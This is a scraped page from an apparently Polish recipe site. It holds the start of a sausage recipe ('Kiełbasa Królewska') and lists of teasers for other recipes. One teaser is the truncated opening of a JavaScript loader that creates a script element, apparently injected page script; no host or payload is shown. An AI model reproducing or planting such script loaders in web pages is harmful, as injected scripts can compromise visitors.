Kiełbasa Królewska
Źródło: https://smakijackaw.blogspot.com/2018/07/kiebasa-krolewska.html
SUROWIEC I ROZDRABNIANIE-lopatka 1,2 kg /krojona w kostke 2 cm-max 3 cm-udziec z indyka bez skory 1,2 kg/szarpak-jedna duza golonka bez skory 1 kg /4 mm-slonina bez skory 600 g/ w kostke 1 cm-max 2 cm-katnica wolowa /dzielimy ja mniej wiecej na polPRZYPRAWY I MATERIAŁY POMOCNICZE-peklosol 18 g/kg do lopatki,udzca i golonki-sol morska 19 g /kg do sloniny-pieprz czarny drobno mielony 3 g/kg-czosnek...
Najnowsze przepisy
Ciasto jest wyśmienite, wielowarstwowe począwszy od... ⇖ 5
Problemy z trawieniem, podwyższony cholesterol, zaparcia,... ⇖ 10
(function(){ u7xb=document.createElement("script");u7xb.type ⇖ 10
Rurki z kremem Kinder to przepis, który smakiem przenosi... ⇖ 11
20.12.2025 Magda Śledzie z grzybami i pieczoną papryką... ⇖ 15
Zapraszam Was dziś na przepyszne ciasto makowe z kremem... ⇖ 33
Zupa rybna z łososiem i krewetkami pachnie fenkułem,... ⇖ 29
Przepisy z bloga
SUROWIEC-400 g mięso z łopatki-300 g mięso drobiowe-300... ⇖ 234
SUROWIEC I ROZDRABNIANIEMielenie odbywało się na maszynce... ⇖ 194
SKŁADNIKI I PRZYPRAWY I MATERIAŁY POMOCNICZE-karkówka... ⇖ 1457
SUROWIECWP-boczek bez skóry 1 kg-pachwina bez skóry1... ⇖ 203
SUROWIEC I ROZDRABNIANIE-łopatka 2 kg/8 mm-pachwina 0,5... ⇖ 254
SUROWIEC, PRZYPRAWY I MATERIAŁY POMOCNICZE-ćwiartki z... ⇖ 267
SUROWIEC, PRZYPRAWY I MATERIAŁY POMOCNICZE-boczek ze... ⇖ 286
SUROWIEC, PRZYPRAWY I MATERIAŁY POMOCNICZE-karkówka... ⇖ 461
Przepisy na czasie
Prosty przepis na klasyczny drożdżowy makowiec. Przepis... ⇖ 2592
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 2081
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1426
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 833
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 739
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 672
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 639
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 632









































